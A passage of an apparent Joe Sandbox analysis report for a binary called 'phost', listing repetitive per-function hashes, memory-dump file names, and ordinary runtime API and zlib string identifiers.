                                                                                                                                                                                                                              • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                              • Instruction ID: 9fd4ae548ac1ef3df7c51d4114e7dfce83ccbd1a0ccab4bef7e6d245794e04f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1B1D662B1C69241EE619B2ADC015BA63B1EB45BF8F448131EE5D87BD5EF3CE441C302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F1A
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F2B
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9561C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62CC95F3C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC95638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9564C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62CC9617C), ref: 00007FF62CC95F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                              • Instruction ID: 487cc8da38f35d392e169b1bd9d713813a4fca92cb90ad373c67ccca4ad9a43b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6351A272B0864296EB20EF29DC815B96770FF487A8F449235EA4DC7796DF3CE4418742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction ID: 30a86eb453e76a9721887be65965a5b17c55db779209dd1300800f92d1fe55ff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F113A32B14F058AEF008F65EC542B933B4FB59B68F040E35DA6D867A4DF38D1658342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction ID: 9884e701688017cce5f759390f4ae9081b35bddc6a916db2beede986e1fd9a04
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3C1C072B1868687EB24CF19A44467AB7A1F794B98F449135DB4E83784DF3DE801CB40
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                              • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                              • Instruction ID: 9b7c91d07ba56573fa82d877dccee9dbdd5dab4abfcfb21b135deb64a53aecd9
• Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
• Instruction Fuzzy Hash: 18F19172B582C58BEBA58F1D8C88B3A3ABDEF44760F055538DA498B390CF38D949D741

APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
• Instruction ID: 8f2ab1184367e3b344c4831637e4a9b847959ce708a5af8493890a8ff7b51690
• Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
• Instruction Fuzzy Hash: 4FB11573A04B898AEB198F2DC8863687BB0F784B6CF19C925DA5D837A4CF39D451C701

Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
• Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
• Instruction ID: 5cbca36b0ded584e0db3335e8b02d8e2f90d423ae5fb83d6b445af7960f6a7ce
• Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
• Instruction Fuzzy Hash: 76E19476B1864681EF6A8E2D885097A33B0FF45FE4F186335DA4E87694DF29E841C702

Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID: incorrect header check$invalid window size
• API String ID: 0-900081337
• Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
• Instruction ID: 6286b607bcdfcaa834106af2a137d62efbb1132cf917ec4d7b21707be0d513e7
• Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
• Instruction Fuzzy Hash: 7C918772B182C647EBA48F19C858B3E3ABDFB44360F115139DA5A8A7C0CF38E544DB41

Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID: e+000$gfff
• API String ID: 0-3030954782
• Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
• Instruction ID: b3636811c3238f80ab1bc0681b2c2c3effea66ec407daa00a5a7a538f5e922e2
• Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
• Instruction Fuzzy Hash: E2515866B182C186EB268E399C00B6A67A1E744BE4F48C735CB9CC7AC5CF3DE441C702

Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
• Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
• Instruction ID: 12439d3948b566193bfb97e25fb1f96624917a200caaee01c36236ff8a297f8d
• Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
• Instruction Fuzzy Hash: 2002DF22F2D65240FE66AB5D9C0527A26B0AF09BB8F45C634ED5DC63D2DE3CE4418382

Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
• Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
• Instruction ID: 8ed0a325abbebc556dbaa8c3a34bb106706a3594526e4babc6a21b0a098ca09e
• Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
• Instruction Fuzzy Hash: 87A12863B087C646EF22CF29A840BAA7BA1AF557E4F058232DE4D87785DE3DD501C712

Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
• Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
• Instruction ID: 540ebdcd32bf9b8a673396298c049ceafd84849ff5e3691c38c679bb19afdf05
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D519011F1C35241FE66AB2E5D0197B52B1AF84BE8F494234DE0DC7BD6EE3CE4424202
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                              • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                              • Instruction ID: 615515d958ef1e2830411ea756480a6fbd1cbaf0f54bae136b10a0ade0d45216
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB09220F07E02D2EE092B696C8622822B4BF58720F984138C00C80330DE2C24E55703
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                              • Instruction ID: 9d464e59a12c1f056b2ed81600ed94f485c1cc1fa13374306b6fd2bdd4b97c96
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2D1B762B0864245EF6A8A2D8950A3E27B0FB45BE8F196335CE0D877D5DF3DE845C342
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                              • Instruction ID: ba7c67acc3c4d07c6eda480dcc72c9fbca6924ad6c652eb1cfe9633a1f97b768
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEC1C0722181E08BD289EB29E87947A73E0F78931DB95406BEF87477C5CB3CA414EB11
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                              • Instruction ID: 1d0d6760f02e976e344a04367bbf5b231a203509d5536b6afae0cabb7fb63927
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6B18F72A0879585EB66CF2DC85853E3BB0E745BA8F240236CA4E87399CF39D841C756
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                              • Instruction ID: 8c82952844eb40c428ec31e8ab80b491e2e58a5bb7650f83c1cd5a463b148e7d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A981C3B6B0C6C146EE758B1DA840B7B7AA1FB457E4F544339DA8D83B99CE3DE4408B01
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
• Instruction ID: 71e26bd8f4d977f5ea8af51a0ad2767bf53bbaff76850ba6f309c1e2347d9673
• Opcode Fuzzy Hash: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
• Instruction Fuzzy Hash: AA612622F1C2D286FFA5AB2CCC5463D66B0AF41778F158239DA1DC6AD5DE7DE8008702

Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
